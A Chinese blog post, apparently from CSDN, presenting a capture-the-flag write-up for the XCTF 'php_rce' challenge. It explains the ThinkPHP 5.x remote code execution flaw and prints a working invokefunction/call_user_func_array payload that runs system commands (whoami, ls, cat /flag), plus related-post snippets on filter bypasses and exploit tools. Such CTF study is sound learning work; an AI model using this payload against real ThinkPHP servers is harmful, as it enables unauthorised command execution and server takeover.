php_rce-攻防世界

最新推荐文章于 2024-04-09 19:30:11 发布
最新推荐文章于 2024-04-09 19:30:11 发布
阅读量529 收藏 16
点赞数 14
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szhangliwenya/article/details/137038813
版权

题目

 上来就看到thinkphp应该就是考察框架漏洞,直接查相关漏洞

RCE:远程代码执行漏洞
远程命令/代码执行漏洞,简称RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。

漏洞产生的根本原因
服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令

该漏洞是由于ThinkPHP5在处理控制器传参时,没有对参数进行充分的过滤与验证,导致恶意用户可以通过提交恶意数据,构造出一个带有PHP函数的控制器方法,并通过URL参数的形式访问该方法,从而触发远程代码执行漏洞。

Thinkphp v5.x 远程代码执行漏洞复现及POC集合-CSDN博客

ThinkPHP 5.x 远程命令执行漏洞分析与复现 | PHP 技术论坛 (learnku.com)

Thinkphp 5.x 远程代码执行漏洞利用小记 - Scivous - 博客园 (cnblogs.com)

随便构造个参数报错

拿到版本号

攻击exp

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

  1. index.php,这是ThinkPHP框架的默认入口文件。

  2. ?s=index/think\app/invokefunctions 参数通常用于指定ThinkPHP框架中的模块/控制器/方法。在这里,它指向了一个名为 think\app\invokefunction 的方法或功能。

  3. &function=call_user_func_array

    这个参数告诉 invokefunction 方法要调用的函数是 call_user_func_arraycall_user_func_array 是PHP中的一个函数,它用于调用一个用户自定义的函数,并为其传递一个参数数组。 

  4. &vars[0]=system

    这是传递给 call_user_func_array 的第一个参数。它指定了要调用的函数是 systemsystem 是PHP中的一个函数,它用于执行外部程序,并显示输出。

  5. &vars[1][]=whoami

    这是传递给 call_user_func_array 的第二个参数,它是一个数组。在这里,它只包含一个元素:whoamiwhoami 是一个常见的Unix命令,用于显示当前用户的名称

 

 index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

查看根目录下的文件 

 

 查看 flag目录下的文件

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag

 

查看/flag文件

 index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat  
 /flag

攻防世界XCTF:php_rce_xctf php_rce-CSDN博客 

20_aw
关注
  • 14
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 5245
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
PHPRCE
m0_63045593的博客
04-22 932
PHPRCE <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store
攻防世界-web篇(php_rce)详解
qq_54803507的博客
09-25 2433
web篇(php_rce)详解
PHP-RCE绕过的姿势总结
有时候,想要一块二向箔
02-18 7684
一、命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接二、代码执行总结参考文章 前言 做了很多的题目,静下心来学习大佬做点小总结 一、命令执行 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 取反绕过 取反两次就可以得到想要绕过限制的数据 传参时 ?code=(~%8F%97%8F%96%91%99%90)(); 在做NSS平台上的一道rce题目就是用到类似的思路,
攻防世界:inget&php_rce&Web_php_include&unserialize3
weixin_74473832的博客
03-15 575
查了一下str.replace (old, new max]) 有三个参数,old是需要替换的值,new是替换后的值,max是最多替换的次数。这里的意思大概就是要用get方式提交一个page参数,但是会过滤掉page的值里面的php://。代码的意思大概是有一个xctf的类,会调用wakeup魔术方法,然后会回显bad requests。根据题目说的php-rce,去浏览器搜索这个版本的thinkphp框架的历史命令执行漏洞。这里用的是or,前后关系中只要一个对的,这个关系式就是真的,所以成功绕过。
php入门rce
五分之一世纪
08-06 1346
文章目录(1)什么是rce(2)php中的命令执行(3)php中代码执行的情况(4)一般的过滤方法(5)一般绕过方法 (1)什么是rce RCE(remote command/code execute)。分为远程命令执行ping以及远程代码执行evel。漏洞出现的原因是没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 (2)php中的命
php_rce(攻防世界lv.2)
qq_66013948的博客
10-25 289
可以看到当前目录内的文件,既然这样能够成功,那么我们就可以试着把退回根目录找有关flag的文件夹或者文件,最后在根目录上找的了个flag的文件夹,之后就是构造payload为。这是一道关于thinkphp5的一个典型的rce漏洞,可以去。里面看有关漏洞的分析,通常构造的payload为。可以看到flag了。
php_rce
weixin_43906500的博客
01-30 1238
攻防世界中习题 可知其为thinkphp5的远程代码执行漏洞,通过查阅资料可知 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。 影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 相关代码 think\Container在tp运行的时候就会被加载。使用think\Container这个字符串实例化控制器的时候就会实例化Contain
php rce和绕过
m0_73973498的博客
10-08 2109
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
攻防世界-php_rce(远程执行漏洞)
m0_62094846的博客
12-21 1352
打开可以看到一个比较真实的网站,也有超链接可以连接到其他的网站 看到ThinkPHP就可以想到远程执行漏洞(看wp) 语句: index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代码 index.php?s=index/\think\app/invokefunction&function=call_use...
SMBGhost_RCE_PoC-master.zip
06-11
CVE-2020-0796代码执行EXP,接管主机权限,获取用户shell。该文件主要以学习为主,请遵守网络安全法,如若造成破坏,与本人无关。
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCE(CVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
fastjson_rce_tool-master.zip
05-14
个人亲试,好用的脚本文件
Exploit-Nagios-XI-5.7.X_Remote-Code-Execution-RCE-Authenticated:Nagios XI 5.7.X-远程执行代码RCE(已认证)
04-10
利用Nagios-XI-5.7.X远程代码执行RCE身份验证 Nagios XI 5.7.X-远程执行代码RCE(已认证)
TDOA_RCE:通达OA综合利用工具
03-03
工具说明 通达OA综合利用工具_20210224 集成POC如下 任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 ...
攻防世界php_rce (ThinkPHP5)
最新发布
2302_79800344的博客
04-09 604
【代码】【攻防世界php_rce (ThinkPHP5漏洞)
攻防世界-web-进阶-php_rce
weixin_31610083的博客
11-10 3162
【题目描述】 无 【附件】 无 【过程及思路】 打开在线场景。 是一个关于ThinkPHP的页面,看起来没什么特别的,几个链接点进去也都是正常的官方链接。 我们尝试到github搜索ThinkPHP V5,发现有相关的“远程代码执行”漏洞集合。 RCE(远程代码执行漏洞) 用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。...
PHP_RCE
The code way of kinnisoy
03-22 4195
常用函数: system(); scandir(); fopen("",""); url代码执行payload /?url= $g=scandir(%22../../../%22)[7]; $f=fopen(%22../../../$g%22,%22r%22); while(!feof($f)) { echo%20 fgetc($f); }// %20 %22 "
攻防世界php_rce
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值